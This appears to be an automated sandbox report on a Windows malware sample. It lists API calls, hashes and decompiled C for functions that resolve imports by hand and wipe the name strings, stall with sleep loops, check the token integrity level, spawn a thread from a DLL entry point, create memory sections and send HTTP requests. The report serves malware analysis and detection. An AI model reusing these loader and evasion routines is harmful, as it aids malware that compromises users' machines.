CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A), ref: 1000131F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?), ref: 10001327

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: aca8c327238908b6bb845b651303a48220addb25810d7f689fd15986140cd55b
Instruction ID: 23014b8b4f9051bbbcbfa4c64bc6cb21a5997a9fd7696493801a3747896fb516
Opcode Fuzzy Hash: aca8c327238908b6bb845b651303a48220addb25810d7f689fd15986140cd55b
Instruction Fuzzy Hash: C9217FB2A00118BFE711EFA8CC84EDE77ADEB483D1F118135FA15D7158DA719A458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CF65B1, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00CF65B1(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00CFB042();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xcfd2a4; // 0x247a5a8
				_t5 = _t13 + 0xcfe862; // 0x3178e0a
				_t6 = _t13 + 0xcfe59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00CFACDA();
				_t17 = CreateFileMappingW(0xffffffff, 0xcfd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00cf65b1
0x00cf65b9
0x00cf65bd
0x00cf65c3
0x00cf65c8
0x00cf65cd
0x00cf65d0
0x00cf65d3
0x00cf65d8
0x00cf65d9
0x00cf65dc
0x00cf65e1
0x00cf65e8
0x00cf65f2
0x00cf65f4
0x00cf65f5
0x00cf65f8
0x00cf6614
0x00cf661a
0x00cf661e
0x00cf666c
0x00cf6620
0x00cf662d
0x00cf663d
0x00cf6645
0x00cf6657
0x00cf665b
0x00000000
0x00000000
0x00cf6647
0x00cf664a
0x00cf664f
0x00cf6651
0x00cf6651
0x00cf662f
0x00cf6631
0x00cf665d
0x00cf665e
0x00cf665e
0x00cf662d
0x00cf6673

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00CF4F74,?,?,4D283A53,?,?), ref: 00CF65BD
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00CF65D3
_snwprintf.NTDLL ref: 00CF65F8
CreateFileMappingW.KERNELBASE(000000FF,00CFD2A8,00000004,00000000,00001000,?), ref: 00CF6614
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00CF4F74,?,?,4D283A53), ref: 00CF6626
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00CF663D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00CF4F74,?,?), ref: 00CF665E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00CF4F74,?,?,4D283A53), ref: 00CF6666

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: f0f2b2683583c32c368eda5f69587f8f9b217106aa0b14f571868482b008614f
Instruction ID: 319b39dd0f50dc39d02596d2fd77a377100e5cc38a99d6953c6270120aa5fe53
Opcode Fuzzy Hash: f0f2b2683583c32c368eda5f69587f8f9b217106aa0b14f571868482b008614f
Instruction Fuzzy Hash: 1B21D27260020CFBD751ABA4DD46FBE77B9AB44750F200161F715EB2D0EB709A05DB52

Uniqueness

Uniqueness Score: -1.00%

Function 100010DC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010DC(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62); // executed
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x100010e5
0x100010eb
0x100010f0
0x100010f5
0x100011f6
0x100011fb
0x100011fb
0x100010fc
0x100010ff
0x10001102
0x10001107
0x100011f5
0x00000000
0x100011f5
0x1000110e
0x1000110e
0x10001112
0x10001118
0x1000111d
0x00000000
0x00000000
0x10001123
0x10001132
0x10001137
0x10001139
0x1000113c
0x10001141
0x1000114d
0x1000114d
0x10001150
0x10001154
0x100011da
0x100011da
0x100011dd
0x100011e0
0x100011e5
0x00000000
0x00000000
0x100011f4
0x00000000
0x100011f4
0x1000115e
0x10001161
0x00000000
0x10001163
0x10001163
0x1000116c
0x10001181
0x10001183
0x1000117a
0x1000117a
0x1000117a
0x10001165
0x10001165
0x10001165
0x10001186
0x10001186
0x1000118b
0x1000118d
0x1000118d
0x10001195
0x1000119b
0x100011a0
0x00000000
0x00000000
0x100011a4
0x100011a6
0x100011b4
0x100011b9
0x100011b9
0x100011c2
0x100011c5
0x100011c8
0x100011cc
0x00000000
0x100011ce
0x100011d7
0x100011d7
0x00000000
0x100011d7
0x100011d0
0x100011d0
0x00000000
0x100011d0
0x10001143
0x10001147
0x00000000
0x00000000
0x00000000
0x10001147
0x100011ed
0x00000000

APIs

LoadLibraryA.KERNELBASE(?,?,?,00000000,?,?,?,00000002), ref: 10001112
lstrlenA.KERNEL32(?), ref: 10001128
memset.NTDLL ref: 10001132
GetProcAddress.KERNEL32(?,00000002), ref: 10001195
lstrlenA.KERNEL32(-00000002), ref: 100011AA
memset.NTDLL ref: 100011B4

Strings

~, xrefs: 100011ED

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: 863695ba407b188a3801e1a53bb91d28a8b2d30b78f9075b511b3a0e9345712c
Instruction ID: 36b666a509a82521409ce3d951f77a8f70ef17c10a1a7333a504bd0e8306a4b8
Opcode Fuzzy Hash: 863695ba407b188a3801e1a53bb91d28a8b2d30b78f9075b511b3a0e9345712c
Instruction Fuzzy Hash: C6316F76A01616ABEB18CF59DC90AEEB7F4EF443C0F214069EE05DB244EB30EA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1000, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00CF1000(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xcfd238 = _t10;
				if(_t10 != 0) {
					 *0xcfd1a8 = GetTickCount();
					_t12 = E00CF9864(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L00CFB1A6();
							_t33 = _t14 + _t16;
							_t18 = E00CF904C(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E00CF928F(_t25) != 0) {
							 *0xcfd260 = 1; // executed
						}
						_t12 = E00CF4EE5(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x00cf1000
0x00cf1006
0x00cf1007
0x00cf1013
0x00cf1019
0x00cf1020
0x00cf1030
0x00cf1035
0x00cf103c
0x00cf103e
0x00cf1043
0x00cf1049
0x00cf104f
0x00cf1059
0x00cf105d
0x00cf105f
0x00cf1064
0x00cf1065
0x00cf1066
0x00cf106b
0x00cf1071
0x00cf107a
0x00cf107b
0x00cf1080
0x00cf1086
0x00cf1092
0x00cf1094
0x00cf1094
0x00cf109e
0x00cf109e
0x00cf1022
0x00cf1024
0x00cf1024
0x00cf10a8

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00CF91B4,?), ref: 00CF1013
GetTickCount.KERNEL32 ref: 00CF1027
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00CF91B4,?), ref: 00CF1043
SwitchToThread.KERNEL32(?,00000001,?,?,?,00CF91B4,?), ref: 00CF1049
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00CF1066
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00CF91B4,?), ref: 00CF1080

Strings

BbV, xrefs: 00CF1030

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID: BbV
API String ID: 507476733-1503427928
Opcode ID: 69fb51001c56edef7c25d2e2b0a8ec3fe0221a7af815f3a371f6588e7a0734cc
Instruction ID: e6b5187cb0821143abdea3f0689dca7511f1522327a4d39d4014c6831ea80096
Opcode Fuzzy Hash: 69fb51001c56edef7c25d2e2b0a8ec3fe0221a7af815f3a371f6588e7a0734cc
Instruction Fuzzy Hash: 9511C272B00208BBE754AB64DC4AF7E3AA8EB44350F140519FA55C6290EEB0D940D653

Uniqueness

Uniqueness Score: -1.00%

Function 00CF6B7B, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF6B7B(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xcfd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00CF8D59(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00CF677C(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00cf6b88
0x00cf6b8f
0x00cf6b96
0x00cf6baa
0x00cf6bb5
0x00cf6bcd
0x00cf6bda
0x00cf6bdd
0x00cf6be2
0x00cf6bed
0x00cf6bf1
0x00cf6c00
0x00cf6c04
0x00cf6c20
0x00cf6c20
0x00cf6c24
0x00cf6c24
0x00cf6c29
0x00cf6c2d
0x00cf6c33
0x00cf6c34
0x00cf6c3b
0x00cf6c41

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00CF6BAD
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00CF6BCD
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00CF6BDD
CloseHandle.KERNEL32(00000000), ref: 00CF6C2D

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00CF6C00
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00CF6C08
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00CF6C18

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: f72f46053b9d55c9765475969612da51d2953ee4b7a177e860123632095d89e7
Instruction ID: 89c82c5212c600a8cb5cc06596efb243c2522c40595719ae9341411c749cce4a
Opcode Fuzzy Hash: f72f46053b9d55c9765475969612da51d2953ee4b7a177e860123632095d89e7
Instruction Fuzzy Hash: BC213C7590020DFFEB009F94DD84EBEBB79EB48304F1040A6EA51A61A1DB718F05EF61

Uniqueness

Uniqueness Score: -1.00%

Function 10001CF0, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000410c;
						if( *0x1000410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004118;
								if( *0x10004118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000410c);
						}
						HeapDestroy( *0x10004110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x10004110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10004130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E10001C56, E10001561(_a12, 0, 0x10004118, _t41), 0,  &_a8); // executed
							 *0x1000410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x10001cf3
0x10001cff
0x10001d01
0x10001d04
0x10001d7e
0x10001d84
0x10001d86
0x10001d88
0x10001d8e
0x10001d90
0x10001d95
0x10001d98
0x10001da3
0x10001da5
0x00000000
0x00000000
0x10001da7
0x10001daa
0x10001dac
0x00000000
0x00000000
0x00000000
0x10001dac
0x10001db4
0x10001db4
0x10001dc0
0x10001dc0
0x10001d06
0x10001d07
0x10001d27
0x10001d2d
0x10001d32
0x10001d34
0x10001d74
0x10001d74
0x10001d36
0x10001d3e
0x10001d45
0x10001d5e
0x10001d64
0x10001d6b
0x10001d70
0x00000000
0x10001d70
0x10001d6b
0x10001d34
0x10001d07
0x10001dcd

APIs

InterlockedIncrement.KERNEL32(10004108), ref: 10001D12
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001D27
CreateThread.KERNEL32 ref: 10001D5E
InterlockedDecrement.KERNEL32(10004108), ref: 10001D7E
SleepEx.KERNEL32(00000064,00000001), ref: 10001D98
CloseHandle.KERNEL32 ref: 10001DB4
HeapDestroy.KERNEL32 ref: 10001DC0

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID:
API String ID: 3416589138-0
Opcode ID: 30ac03b81143d665445cde2889a59d55e2a87aaa08a0f6bb701e3aa90fb78cb0
Instruction ID: 9498d6db21d119f304d1b5f735a85d01eb658a8925806fa2593c798b6c664c0b
Opcode Fuzzy Hash: 30ac03b81143d665445cde2889a59d55e2a87aaa08a0f6bb701e3aa90fb78cb0
Instruction Fuzzy Hash: 282184B1A01255ABF701DF68CCC89DA77F8EB957E17128526F605D3268DB308D80CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00CF9561, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00CF959C
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00CF961F
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00CF965F
SysFreeString.OLEAUT32(00000000), ref: 00CF9681

Part of subcall function 00CF2CC3: SysAllocString.OLEAUT32(00CFC2A8), ref: 00CF2D13

SafeArrayDestroy.OLEAUT32(00000000), ref: 00CF96D4
SysFreeString.OLEAUT32(00000000), ref: 00CF96E3

Part of subcall function 00CF3651: Sleep.KERNELBASE(000001F4), ref: 00CF3699

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 86e8f1945c379062bad27d83319d332e8f1e33aabf36c03520ce6af06c84c3b8
Instruction ID: 1b9fbe40353788d72ca2aff75f564a19d6ccda3d7948d9ce3887b4635b0276f6
Opcode Fuzzy Hash: 86e8f1945c379062bad27d83319d332e8f1e33aabf36c03520ce6af06c84c3b8
Instruction Fuzzy Hash: 8D512D35500609AFDB81DFA8C844BAEB7B6FF88700B158869F615DB224DB31DD05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 100018E1, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100018E1(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E10001669(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x10004144 + 0x10005014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x10004144 + 0x1000514c);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E10001E78(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x10004144 + 0x1000515c);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x10004144 + 0x1000516f);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x10004144 + 0x10005184);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x10004144 + 0x1000519a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E10001DD0(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x100018f0
0x100018f4
0x100019b6
0x100018fa
0x10001912
0x10001921
0x10001928
0x1000192a
0x1000192f
0x100019ae
0x100019af
0x10001931
0x1000193e
0x10001940
0x10001945
0x00000000
0x10001947
0x10001954
0x10001956
0x1000195b
0x00000000
0x1000195d
0x1000196a
0x1000196c
0x10001971
0x00000000
0x10001973
0x10001980
0x10001982
0x10001987
0x00000000
0x10001989
0x1000198f
0x10001994
0x1000199b
0x100019a0
0x100019a5
0x00000000
0x100019a7
0x100019aa
0x100019aa
0x100019a5
0x10001987
0x10001971
0x1000195b
0x10001945
0x1000192f
0x100019c4

APIs

Part of subcall function 10001669: HeapAlloc.KERNEL32(00000000,?,10001C8C,00000208,?,00000000,?,?,?,10001A31,?), ref: 10001675

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,10001EB7,?,?,?,?,00000002,?,?), ref: 10001906
GetProcAddress.KERNEL32(00000000,?), ref: 10001928
GetProcAddress.KERNEL32(00000000,?), ref: 1000193E
GetProcAddress.KERNEL32(00000000,?), ref: 10001954
GetProcAddress.KERNEL32(00000000,?), ref: 1000196A
GetProcAddress.KERNEL32(00000000,?), ref: 10001980

Part of subcall function 10001DD0: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 10001E2D
Part of subcall function 10001DD0: memset.NTDLL ref: 10001E4F

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 69496cd7a9a7d9bbfd03c7c8bbfa86503ae6f850b609d95769a136b0f31ae68b
Instruction ID: 07b4c9ead737c097f440b77457025fa1314e9054e8ebb6748a7bdb02948612b8
Opcode Fuzzy Hash: 69496cd7a9a7d9bbfd03c7c8bbfa86503ae6f850b609d95769a136b0f31ae68b
Instruction Fuzzy Hash: 51213BB160071AAFE710DF69CD90E9BB7ECEF943C5B024166E944C7219EB70E9048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8CE0, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF8CE0(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E00CF552D(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E00CFA934(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x00cf8ce0
0x00cf8ced
0x00cf8cef
0x00cf8d52
0x00000000
0x00cf8d52
0x00cf8d07
0x00cf8d0e
0x00cf8d1a
0x00cf8d1f
0x00cf8d35
0x00cf8d45
0x00000000
0x00cf8d37
0x00cf8d37
0x00cf8d3e
0x00cf8d4b
0x00cf8d4b
0x00cf8d4b
0x00cf8d3e
0x00cf8d35
0x00cf8d50
0x00000000
0x00000000
0x00cf8d56

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,00CF3331,?,?,00000000,00000000), ref: 00CF8D1A
ResetEvent.KERNEL32(?), ref: 00CF8D1F
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 00CF8D2C
GetLastError.KERNEL32 ref: 00CF8D37
GetLastError.KERNEL32(?,?,00000102,00CF3331,?,?,00000000,00000000), ref: 00CF8D52

Part of subcall function 00CF552D: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?,?,00000000), ref: 00CF5539
Part of subcall function 00CF552D: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?), ref: 00CF5597
Part of subcall function 00CF552D: lstrcpy.KERNEL32(00000000,00000000), ref: 00CF55A7

SetEvent.KERNEL32(?), ref: 00CF8D45

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: 1356c19d939e026ffbf8247557d3ee0bbe5f2e11fee8f528d69b22f9f3983310
Instruction ID: 55af6f0c895d6be60c9afe7abe52a1aeb074d7b2010434efc70e035534c43e51
Opcode Fuzzy Hash: 1356c19d939e026ffbf8247557d3ee0bbe5f2e11fee8f528d69b22f9f3983310
Instruction Fuzzy Hash: 6F01623110020AABD6706B61DD44F7BBAA9AF64364F214A25F761D50F0DB21D909DA23

Uniqueness

Uniqueness Score: -1.00%

